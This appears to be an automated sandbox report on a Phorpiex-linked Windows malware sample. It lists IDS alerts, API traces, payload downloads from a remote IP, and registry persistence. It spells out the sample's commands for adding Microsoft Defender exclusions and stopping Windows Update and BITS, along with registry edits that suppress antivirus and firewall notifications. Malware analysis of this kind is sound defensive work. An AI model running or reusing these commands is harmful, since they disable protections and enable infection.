TCP 144.160.235.144:25 -> 192.168.56.103:50239 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50243 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50249 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50260 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50288 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50305 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50317 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50320 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50337 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50347 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
UDP 192.168.56.103:59146 -> 195.158.22.13:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
TCP 144.160.159.21:25 -> 192.168.56.103:50355 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.80:25 -> 192.168.56.103:50354 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50376 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.80:25 -> 192.168.56.103:50395 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 192.168.56.103:50418 -> 144.160.159.21:25 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 192.168.56.103:50416 -> 144.160.235.143:25 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At line:1 char:17
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + Add-MpPreference <<<< -ExclusionPath $env:windir; Add-MpPreference -Exclusio
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: nPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: mmandNotFoundException
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x000000a3
1 1 0

WriteConsoleW

buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x000000af
1 1 0

WriteConsoleW

buffer: h was included, verify that the path is correct and try again.
console_handle: 0x000000bb
1 1 0

WriteConsoleW

buffer: At line:1 char:62
console_handle: 0x000000c7
1 1 0

WriteConsoleW

buffer: + Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference <<<< -Exclusio
console_handle: 0x000000d3
1 1 0

WriteConsoleW

buffer: nPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE
console_handle: 0x000000df
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x000000eb
1 1 0

WriteConsoleW

buffer: mmandNotFoundException
console_handle: 0x000000f7
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000103
1 1 0

WriteConsoleW

buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000123
1 1 0

WriteConsoleW

buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000012f
1 1 0

WriteConsoleW

buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000013b
1 1 0

WriteConsoleW

buffer: At line:1 char:105
console_handle: 0x00000147
1 1 0

WriteConsoleW

buffer: + Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath
console_handle: 0x00000153
1 1 0

WriteConsoleW

buffer: $env:TEMP; Add-MpPreference <<<< -ExclusionPath $env:USERPROFILE
console_handle: 0x0000015f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x0000016b
1 1 0

WriteConsoleW

buffer: mmandNotFoundException
console_handle: 0x00000177
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000183
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] ControlService FAILED 1062: The service has not been started.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] ControlService FAILED 1062: The service has not been started.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041dfe8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e5a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e5a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e5a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041dd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041dd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041dd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041dd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041dd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041dd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e5a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e5a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e5a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e1a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/1
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/ns/n.txt
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/2
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/ns/91.txt
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/3
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/4
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/5
request GET http://185.215.113.66/1
request GET http://icanhazip.com/
request GET http://185.215.113.66/ns/n.txt
request GET http://185.215.113.66/2
request GET http://185.215.113.66/ns/91.txt
request GET http://185.215.113.66/3
request GET http://185.215.113.66/4
request GET http://185.215.113.66/5
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 2031616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02850000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0242a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02422000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02432000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02433000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02434000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0242b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02435000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02436000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02493000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

description sysarddrvs.exe tried to sleep 209 seconds, actually delayed analysis time by 209 seconds
domain icanhazip.com
file C:\Users\test22\AppData\Local\Temp\158876794.exe
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x000003e0
filepath: C:\Users\test22\tbtnds.dat
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\tbtnds.dat
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
cmdline "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
cmdline powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
cmdline "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
cmdline cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
file C:\Users\test22\AppData\Local\Temp\158876794.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
cmdline sc stop UsoSvc
cmdline sc stop DoSvc
cmdline sc stop WaaSMedicSvc
cmdline "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
cmdline sc stop BITS
cmdline sc stop wuauserv
Time & API Arguments Status Return Repeated

ControlService

service_handle: 0x0065b8a0
service_name: wuauserv
control_code: 1
0 0

ControlService

service_handle: 0x0048b850
service_name: BITS
control_code: 1
0 0
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings reg_value C:\Windows\sysarddrvs.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
file C:\Users\test22\AppData\Local\Temp\newtpp.exe:Zone.Identifier
file C:\Users\test22\AppData\Local\Temp\158876794.exe:Zone.Identifier
file C:\Windows\sysarddrvs.exe:Zone.Identifier
description attempts to disable antivirus notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
description attempts to disable antivirus notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
description attempts to disable firewall notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
description attempts to disable firewall notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
description attempts to disable windows update notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
service wuauserv (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start)
service BITS (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start)